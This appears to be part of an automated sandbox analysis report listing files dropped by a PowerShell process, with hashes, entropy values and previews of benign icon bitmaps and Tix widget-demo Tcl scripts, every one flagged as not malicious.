                                                                                                                                                                                                              SHA-512:25BF7D6366301AE868EE7043063BD1C3714288C47E5573D78DD7EC9040A89EA6D9480A21C84D8AA16FEC6F652ED06E8379A67E1CA71A72392EBBC998E14FD6EA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * srcfile_xpm[] = {.."12 12 3 1",.." .s None.c None",.."..c black",.."X.c gray91",.." ........ ",.." .XXXXXX. ",.." .XXXXXX... ",.." .XXXXXXXX. ",.." .XX...XXX. ",.." .X.XXX.XX. ",.." .X.XXXXXX. ",.." .X.XXXXXX. ",.." .X.XXX.XX. ",.." .XX...XXX. ",.." .XXXXXXXX. ",.." .......... "};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (15x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                              Entropy (8bit):3.8259423145339846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:HDKAsn/SNfovGBmM0sn/31UQov7JMIjRtjxfHXjvFJvFJvFJvFJvFJvFJvFJvFJw:HeAs6FmM0s309j7xfHuaYeawhaYOf
                                                                                                                                                                                                              MD5:D5424F918B496CBA6FCA91106F2213B0
                                                                                                                                                                                                              SHA1:F497F7E90FA9F412F19C76B0A84BB4A04871093D
                                                                                                                                                                                                              SHA-256:9B6CB3257D649D1F5FB3B244B9C1E69F0E0435421E8EBE1994097E1B4020B0FE
                                                                                                                                                                                                              SHA-512:24CEC0E32913B7AB37096CE48CCB040469DF2D953E2BBE8346BB13E0746D305F75B8A3CA39A703EC12FD3E83A8CE8CF1666B222409FB52EADDECBAE4A035F7D9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define system_width 15..#define system_height 15..static unsigned char system_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfe, 0x3f,.. 0x02, 0x20, 0x02, 0x20, 0xfe, 0x3f, 0xfe, 0x3f, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 12 x 12
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):79
                                                                                                                                                                                                              Entropy (8bit):4.884698525265448
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CkkXlhetwltxljpWer4LhsUszoWAi:HePV4Lq8i
                                                                                                                                                                                                              MD5:C8A03FA624FE52F2E23FF5F4CB4295B9
                                                                                                                                                                                                              SHA1:08FCBA6BDF6A87A505DED2F142FD21304A3919AC
                                                                                                                                                                                                              SHA-256:3B53A7DA944E77D00EBB1B352ECE6B6E50572E0222678087B86BB163A3969150
                                                                                                                                                                                                              SHA-512:860A9170CD40DC23FECF3C6754D83E661EF3B3CEC54834A56B4CAEC26F4988C6413C71DF9B2557A01A251AD6CB0A96C7B557FC496BBC19EB1D9DA1C3B81EBE82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a...................!.......,.......... D..k..X{.. ....x\Wq.....^g...;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (12x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):250
                                                                                                                                                                                                              Entropy (8bit):4.17176459478117
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeA48GoeB7048NeVl9BYHMDfHOEhihkhvawgHchkhghCG:HeWGiIJBYHW5hy+hkhgV
                                                                                                                                                                                                              MD5:B498147F30BA72B31C662D271281AFBD
                                                                                                                                                                                                              SHA1:275ADB3E9DEA7DD1AC020C64E72BDE6C036E8BBE
                                                                                                                                                                                                              SHA-256:B5DCA68AB0947B6C797BA946911B3925FDED77A97992079BDA14B81A338C799F
                                                                                                                                                                                                              SHA-512:1385E1006CD509565FDB9745DE21B715641B667127AE2DE8027945A8C10044931852A0EC3897A057152E608925E525E086621A090C1F640C86F7B30FD05CEA21
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define textfile_width 12..#define textfile_height 12..static unsigned char textfile_bits[] = {.. 0xfe, 0x01, 0x02, 0x01, 0x02, 0x07, 0x7a, 0x04, 0x02, 0x04, 0x3a, 0x04,.. 0x02, 0x04, 0xfa, 0x04, 0x02, 0x04, 0xfa, 0x04, 0x02, 0x04, 0xfe, 0x07};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):320
                                                                                                                                                                                                              Entropy (8bit):3.9285165909161894
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:UGCinNOYdiGeyURv3LSFHGJU9spLNgHqNlp69pFF29pLLFHmPLVx4h9f9LFHYHfS:UGXoYdVfcv3mFHeU9s3NWwo6oaoaots
                                                                                                                                                                                                              MD5:1EFD979E39DD241EA6032012A6F86EC0
                                                                                                                                                                                                              SHA1:B8E79446ACE6914C1FDDF7F6D34147CEDD633751
                                                                                                                                                                                                              SHA-256:6D30E5711BA26D348C2FE18C510FD4997D1A9E78E32085060F0CCD87674A0BFC
                                                                                                                                                                                                              SHA-512:E2374FB7C16B474DC349030761426CF9DADBCC09695E00C31D0D83BFBF487BFBFE19F0F28A21E24EBAE406BBD0A0A5EF459760E3BB2FA1D657633BA3A3D6235F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * textfile_xpm[] = {.."12 12 3 1",.." .s None.c None",.."..c black",.."X.c #FFFFFFFFF3CE",.." ........ ",.." .XXXXXX. ",.." .XXXXXX... ",.." .X....XXX. ",.." .XXXXXXXX. ",.." .X...XXXX. ",.." .XXXXXXXX. ",.." .X.....XX. ",.." .XXXXXXXX. ",.." .X.....XX. ",.." .XXXXXXXX. ",.." .......... "};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (14x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                              Entropy (8bit):3.864080853262613
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAxJCofDM0xSHOREnjIfHqaH+rhaELOhyLg2a4f:HearfDliZaH2haA5L8m
                                                                                                                                                                                                              MD5:C6DC3B8D7D2FBBE7934CB58105CE68D3
                                                                                                                                                                                                              SHA1:974D90A453B444312BC47E224FC6C5E4BBF08171
                                                                                                                                                                                                              SHA-256:70920A3C0F5135827CCEA0B18368F330DCA166B6C1530D687A6D85A7F4D24276
                                                                                                                                                                                                              SHA-512:3ADE85F2645AB89361D87ADA530B4E026DEF676E011361AB430D81BDC2D89926A326A2DD6585448B1A3F7F633026ACAD8E190FAEBA8B2AAD27DD69A446DAA0A7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define tick_width 14..#define tick_height 14..static char tick_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x38, 0x00, 0x1c, 0x00, 0x0e,.. 0x00, 0x07, 0x80, 0x03, 0xc2, 0x01, 0xe7, 0x00, 0x7f, 0x00, 0x3e, 0x00,.. 0x1c, 0x00, 0x08, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                              Entropy (8bit):6.328903939938374
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CsliXMcyltxlXlChh/U7KPhx3IpVl44fyNynfP7T2QQLwFlIeXn0EnjNth:NlI3hy7Iz4pVl8Ng7T2QQLEIIn0Ehth
                                                                                                                                                                                                              MD5:1DBC69E845CE84F1EA888039D8B1A221
                                                                                                                                                                                                              SHA1:8512A535C25E9B91721E20FB19816C217F916DD1
                                                                                                                                                                                                              SHA-256:4855AE49469C2C9AA238564D41C57E75CCD4A391156B273A042096382CD3C732
                                                                                                                                                                                                              SHA-512:5372D623841DE135A1E612E78B1BA3E970F1FECB3E5CCD14B37EC38EAD3D6F932FBF4130CF32A477D9578B1FA2B9F5A07AF378D4E095945A9E1B0CB119826A6D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a . ................!.......,.... . ..........a......(...\.&6.i.....)....m.Y...p@Z.....=#0.i:.B(*g<Z/.h[..*^1.\n9.Su5.v... <E.G..;2m..'.5...u..b...2......0..5.D.s.y..P..;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1300
                                                                                                                                                                                                              Entropy (8bit):2.60271123285431
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:UGXRmfwvv3mFYNN4iAAgiy8JwwaCCCCSSSSeAA74iiiyAAkf:UGBmYvf9xJwwHAA7vf
                                                                                                                                                                                                              MD5:18637AE6E12C360CF2B2D4E7523A0DE8
                                                                                                                                                                                                              SHA1:157E5BC3FDA32C60DC6673D39A05DD5BB492C4D5
                                                                                                                                                                                                              SHA-256:A74C0ABAA65318CAA8D118955AC0CCE9C81E585AE2079C635C16D911DEBBF3FA
                                                                                                                                                                                                              SHA-512:DC07AE18F364D1162BA62071B1ED8DFA1D43975B1FB1D14A10462A085660E352A829C74FE7BA60C6887C80443E1E1656A06A3867678132E9CCE7BEE2A4C7231F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * warning_xpm[] = {.."32 32 3 1",.." .s None.c None",.."..c #000000000000",.."X.c yellow",.." ",.." ......... ",.." ...XXXXXXXXX... ",.." .XXXXXXXXXXXXXXX. ",.." ..XXXXXXXXXXXXXXXXX.. ",.." .XXXXXXXXX...XXXXXXXXX. ",.." .XXXXXXXXX.....XXXXXXXXX. ",.." .XXXXXXXXX.....XXXXXXXXX. ",.." .XXXXXXXXX.......XXXXXXXXX. ",.." .XXXXXXXXXX.......XXXXXXXXXX. ",.." .XXXXXXXXXX.......XXXXXXXXXX. ",.." .XXXXXXXXXX.......XXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXXX.....XXXXXXXXXXXX. ",..".XXXXXXXXXXXX.....XXXXXXXXXXXX. ",..".XXXXXXXXXXXX.....XXXXXXXXXXXX. ",..".XXXXXXXXXXXXX...XXXXXXXXXXXXX. ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXXXX...XXXXXXXXXXXX. ",.." .XXXXXXXXXXX.....XXXXXXXXXXX. "
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9221
                                                                                                                                                                                                              Entropy (8bit):4.76620006805087
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:vM5738gO1TW3DjriSNVyK0PuAp8cgRVmfA/X+SI/RPQzvRSir:vMp3HOIriSNV5cuAqRYfA/X+S2G
                                                                                                                                                                                                              MD5:9DFBD5F017DB2F23D203BA2D4F2D5BF1
                                                                                                                                                                                                              SHA1:E7DCCC73A9A07D9E23F2FBADE8A60FD802EC34BF
                                                                                                                                                                                                              SHA-256:15855B365F76E23CEC3629AD97D7FC52BA673538026D11851CF59D2F725D0443
                                                                                                                                                                                                              SHA-512:128D69E9519D6334453434A4EF2BE1B75CA85C203B3A6D65658F23286D82F2372BB4EC94B2FD57028D040FB7B4F2E5EA8353F7D24B06F10EA7016EECD2E573DD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: MkChoose.tcl,v 1.4 2004/03/28 02:44:56 hobbs Exp $..#..# MkChoose.tcl --..#..#.This file implements the "Choosers" page in the widget demo..#..#.This file has not been properly documented. It is NOT intended..#.to be used as an introductory demo program about Tix..#.programming. For such demos, please see the files in the..#.demos/samples directory or go to the "Samples" page in the..#."widget demo"..#..#..# Copyright (c) 1996, Expert Interface Technologies..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc MkChoosers {nb page} {.. set w [$nb subwidget $page].... set name [tixOptionName $w].. option add *$name*TixLabelFrame*label.padX 4.... tixLabelFrame $w.til -label "Chooser Widgets".. tixLabelFrame $w.cbx -label "tixComboBox".. tixLabelFrame $w.ctl -label "tixControl".. tixLabelFram
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2087
                                                                                                                                                                                                              Entropy (8bit):5.028915983502562
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:LMEHK8ZNYNIMkCQ/4FvHHQYvLyRDzcLoBTk4eDy:XK8ZN/CHvTy9Yq
                                                                                                                                                                                                              MD5:FDEB830DEC445E7E73BAAC2A299A1724
                                                                                                                                                                                                              SHA1:92C1CEEF76E4FD09CE9CC87EF0F66B88D3B1905D
                                                                                                                                                                                                              SHA-256:1F55AB4DEBD9928F5735E6B819FA9E59461649E69AA708C94AB617E4C3068C3C
                                                                                                                                                                                                              SHA-512:C4CFB3DC015EE8A047E9DB724D8892B969BCDA11110F28053F2A380DC98049504440121B9812CFC1E65070D999728890E28B0DDC27BDEB40C398FEC5D6EB5636
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: MkDirLis.tcl,v 1.4 2004/03/28 02:44:56 hobbs Exp $..#..# MkDirLis.tcl --..#..#.This file implements the "Directory List" page in the widget demo..#..#.This file has not been properly documented. It is NOT intended..#.to be used as an introductory demo program about Tix..#.programming. For such demos, please see the files in the..#.demos/samples directory or go to the "Samples" page in the..#."widget demo"..#..#..# Copyright (c) 1996, Expert Interface Technologies..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc MkDirList {nb page} {.. set w [$nb subwidget $page].... set name [tixOptionName $w].. option add *$name*TixLabelFrame*label.padX 4.... tixLabelFrame $w.dir -label "tixDirList".. tixLabelFrame $w.fsbox -label "tixExFileSelectBox".. MkDirListWidget [$w.dir subwidget frame].. Mk
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7008
                                                                                                                                                                                                              Entropy (8bit):4.867880619591418
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:co0Wc7ib6DuOQNTuP4bkUyeovKXf1UVMzIXrU6:co0WcQ6DamePXf1GkCJ
                                                                                                                                                                                                              MD5:DBD85403C92133A1F1A6E520918F1773
                                                                                                                                                                                                              SHA1:3C8A01433BBCE747724DB7A117BE007BB361F6A7
                                                                                                                                                                                                              SHA-256:3FA4E078758EB8A77158B9B7136AA8608F23753A0E541F97082C434508EEFAB3
                                                                                                                                                                                                              SHA-512:E9FF80296CD6D41C86D7277923CB109AFAA5AAE11A6125B9FD0A4A1C41CC6F38FDE417F78ED741AA386D7AFD7151D15B8537622C156C94F419501422B79EFEE7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: MkSample.tcl,v 1.3 2001/12/09 05:34:59 idiscovery Exp $..#..# MkSample.tcl --..#..#.This file implements the "Sample" page in the widget demo..#..#.This file has not been properly documented. It is NOT intended..#.to be used as an introductory demo program about Tix..#.programming. For such demos, please see the files in the..#.demos/samples directory or go to the "Samples" page in the..#."widget demo"..#..#..# Copyright (c) 1996, Expert Interface Technologies..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#..#....set tix_demo_running 1..set samples_dir [file join $demo_dir samples]..set sample_filename {}....uplevel #0 source [list [file join $samples_dir AllSampl.tcl]]......proc MkSample {nb page} {.. global tixOption.... #----------------------------------------------------------------------.. set
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5283
                                                                                                                                                                                                              Entropy (8bit):4.858866972377472
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:YjZfIHgZEniSt4QHHOeKcIk44Z35daKAI44vT/vKPb:YjZNlQnKcfFZAqvePb
                                                                                                                                                                                                              MD5:97E2720D72DAA92377BFF4BC9BBE336B
                                                                                                                                                                                                              SHA1:60B9C0497D3921B90CFA5719E571FAE5978F0436
                                                                                                                                                                                                              SHA-256:73EBEECA09E42A09B52B9B9CDA74DC7B1442189E55D695E40F080111BAE5D1B4
                                                                                                                                                                                                              SHA-512:9A827355166E5AF6F28BA9F9C9E52E33F46F96C4CC03A8E99CE6241375E4204EA160EB842E9CB4CDF50514347EFBDBD348A0BAAFECD56B8D7236422520C285AE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: MkScroll.tcl,v 1.3 2001/12/09 05:34:59 idiscovery Exp $..#..# MkScroll.tcl --..#..#.This file implements the "Scrolled Widgets" page in the widget demo..#..#.This file has not been properly documented. It is NOT intended..#.to be used as an introductory demo program about Tix..#.programming. For such demos, please see the files in the..#.demos/samples directory or go to the "Samples" page in the..#."widget demo"..#..#..# Copyright (c) 1996, Expert Interface Technologies..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc MkScroll {nb page} {.. set w [$nb subwidget $page].... set name [tixOptionName $w].. option add *$name*TixLabelFrame*label.padX 4.... tixLabelFrame $w.sls -label "tixScrolledListBox".. tixLabelFrame $w.swn -label "tixScrolledWindow".. tixLabelFrame $w.stx -label "tixScroll
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2360
                                                                                                                                                                                                              Entropy (8bit):2.8198936129892234
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UGlEiBweks+1k2iQhBZmVgJJJJrRUprpqfWf1ZXt6JWp++pi+JJJJJJMquf:jlvBhk91krqyw4A
                                                                                                                                                                                                              MD5:A912D87924AAFE166C6A30FB81CB66F1
                                                                                                                                                                                                              SHA1:47A8C05BA9BD204832F96CB338985D0532398131
                                                                                                                                                                                                              SHA-256:24805C306D3A88DC8274FA0C4225093A7404720FC0D8B294FC803D444965F0D4
                                                                                                                                                                                                              SHA-512:586303875E1D9D932AB9734B68D44BB73C6C434568D638ABDAE06A951A3E145D7232DDC00D257A5E396AFB24E77516AF2CEC2BC81723C9BDC20A63E4494F761B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * about_xpm[] = {.."50 40 7 1",.." .s None.c None",.."..c black",.."X.c white",.."o.c gray70",.."O.c navy",.."+.c red",.."@.c yellow",.." ",.." ",.." ",.." ................................. ",.." ..XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXoo. ",.." .XooooooooooooooooooooooooooooooXo. ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXooXo. ",.." ..oooooooooooooooooooooooooooooooXo. ",.." ...............................XoXo. ",.." .OOOOOOOOOOOOOOOOOOOOOOOOOOOOO.XoXo. ",.." .OOOOOOOOOOOOOOOOOOOOOOOOOOOOO.XoXo. ",.." .OOOOOOOOOOOOOOOOOOOOOOOOOOOOO.XoXo. ",.." .OOOOOOOOOOOOOOOOOOOOOOOOOOOOO.XoXo. ",.." .OOOOOOOOOOOOOOOOOOOOOOOOOOOOO.XoXo.++++ ",.." .OOOOOOOOOOOOOOOOOOOOOOOOOOOOO.XoXo+++ ",.." .OOOOOOOOO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):290
                                                                                                                                                                                                              Entropy (8bit):4.1295650166391304
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAP6orM0PMD93fHleaUgdoFudgdgdga5dgdiVo8diV/dL8GYey:He1aAJteaZdoFSgdgdga5dgdy8lzy
                                                                                                                                                                                                              MD5:D20AC86C2E6AFE2504A47C278C08A015
                                                                                                                                                                                                              SHA1:5AC47A42783B63029C45EABD5690A8631F6350F0
                                                                                                                                                                                                              SHA-256:CB91DDBCCA2DDE4DF8520A857370EFDB5568F544113306DE43662E1B814C6A3D
                                                                                                                                                                                                              SHA-512:E04FA8D58808047968FC044E94AA3AA343734CD6B19B95AAAE630B2E02A3A307EAF8D619C9D87B0547DB97F8852793BA651B90E977E3D35E3438327657D5162C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define bold_width 16..#define bold_height 16..static unsigned char bold_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0xfc, 0x07, 0xfc, 0x0f, 0x18, 0x1c, 0x18, 0x18,.. 0x18, 0x18, 0x18, 0x1c, 0xf8, 0x0f, 0xf8, 0x0f, 0x18, 0x18, 0x18, 0x30,.. 0x18, 0x30, 0x18, 0x38, 0xfc, 0x3f, 0xfc, 0x1f};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):299
                                                                                                                                                                                                              Entropy (8bit):3.921919114698932
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeA8dBJR6orM08dBNApD9zDHqfH9Q2G0VAzQhmhImMVEhF6Mf:HeDDJR6aQD0JvHr2G0SzamMWhwK
                                                                                                                                                                                                              MD5:5049F72CAAF4E5DE9873C4FA1D2588BC
                                                                                                                                                                                                              SHA1:3B7DDC1749B678FA1A7BF568BEB9F5D2A1EEDFEA
                                                                                                                                                                                                              SHA-256:E52E47BBC624E9E9C27ACBD652565C2840AA7E53E6C841006DFB2C619D6ED828
                                                                                                                                                                                                              SHA-512:ACCBF375D25A931D30A5323C442433A18E0721D597F6E3794C8F513F9D41076C43D76B26307E795DFDAFF871CA0627781DFF9051CF9A549EA45CCED4756B9ADD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define capital_width 16..#define capital_height 16..static unsigned char capital_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x08, 0x30, 0x0c, 0x30, 0x06,.. 0x30, 0x03, 0xb0, 0x01, 0xf0, 0x00, 0xf0, 0x00, 0xf0, 0x01, 0xb0, 0x03,.. 0x30, 0x07, 0x30, 0x0e, 0x30, 0x1c, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):299
                                                                                                                                                                                                              Entropy (8bit):3.9092328474598705
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:HDKA8SRNcorM08c6UToDJMIzf1DfHXjvFJvFJvFJvFJvFJvjJvUADJvFJvUJodFH:HeA8i6orM08cMD9zdfHu0HindKLQJsF
                                                                                                                                                                                                              MD5:7E085974A755F4B572EED1CAEA1CFDEF
                                                                                                                                                                                                              SHA1:0023653DF46C9E577C177B81A05433D8764F716D
                                                                                                                                                                                                              SHA-256:2B5D6F8592E2BC6F4C4C56947D21E37C91F5F5C3E5795AE408B632D284EFA35E
                                                                                                                                                                                                              SHA-512:658375EC591FC743329C45E4A16056B4F6CA2E6C0E18E84A088BAD09AB12AC4B12998CDE0FFF3759824A2CC24371FB908C247165F1309ADEC45255BD6D02146C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define centerj_width 16..#define centerj_height 16..static unsigned char centerj_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x3e, 0x00, 0x00, 0xc0, 0x0d,.. 0x00, 0x00, 0x58, 0x77, 0x00, 0x00, 0xb0, 0x3b, 0x00, 0x00, 0xdc, 0xf7,.. 0x00, 0x00, 0xf0, 0x3e, 0x00, 0x00, 0xd8, 0x7e};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):642
                                                                                                                                                                                                              Entropy (8bit):3.0301874460583527
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:UGXT7ffoYRsYsqUNk88EiLUKW2LUKmLUKS51TecKuLCnnRyKuLCn4NyKuLCnxKWV:UGjziBqcoP4UQCLmneLmGQLmlnn/EQp
                                                                                                                                                                                                              MD5:17D41A5610B8A9C2F4D07F48528391A1
                                                                                                                                                                                                              SHA1:88E89A5949CEFC914227EA2BD78A7D016638F3A3
                                                                                                                                                                                                              SHA-256:EF34BFC2D0ED60C004AC50237481BE5E57932638A7495DC5C8FBE08134A4E29C
                                                                                                                                                                                                              SHA-512:09476CABA8FF165FE10D45CED66A97E77044F0C170FC92841EFBEA4B242011482D694B0C63AEDFF6058A4B7E38726CE52F244130D36DA51CC93057F086A93252
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * code_xpm[] = {.."30 15 4 1",.." .c gray94",.."..c #c0c0ff",.."X.c #606060",.."o.c black",.." ",.." ............................X",.." ............................X",.." ...ooo............o.........X",.." ..o...o...........o.........X",.." ..o...............o.........X",.." ..o......ooo...oooo..ooo....X",.." ..o.....o...o.o...o.o...o...X",.." ..o.....o...o.o...o.ooooo...X",.." ..o.....o...o.o...o.o.......X",.." ..o...o.o...o.o...o.o...o...X",.." ...ooo...ooo...oooo..ooo....X",.." ............................X",.." ............................X",.."XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):910
                                                                                                                                                                                                              Entropy (8bit):3.2356193636421913
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeA8LcGyiH08LcGm/4l9z4GsMwGfHKVvOPvXuH6vEvOdvuyvuv6Aquf:HeDfE62/GPmH6MvOdvuyvuSy
                                                                                                                                                                                                              MD5:20B7F2C97CDC8056007CC9728C7A54F2
                                                                                                                                                                                                              SHA1:364BF4DC384AAE252D4C4DB90305E20A38A5D331
                                                                                                                                                                                                              SHA-256:CA2DC0DAB17CF9AE12B98A242D14ECD4F86324C13BD974C48F7BC93903114492
                                                                                                                                                                                                              SHA-512:1DA63D1BA7E98185A2F8385B7E8B4790BA89CB2BBD0BD91851E8D4339B4CD3E785D883D34EE866E7DB52058E8AA16800E81BC4D5A33D0040021EAC27BDB11C1C
                                                                                                                                                                                                              Malicious:false
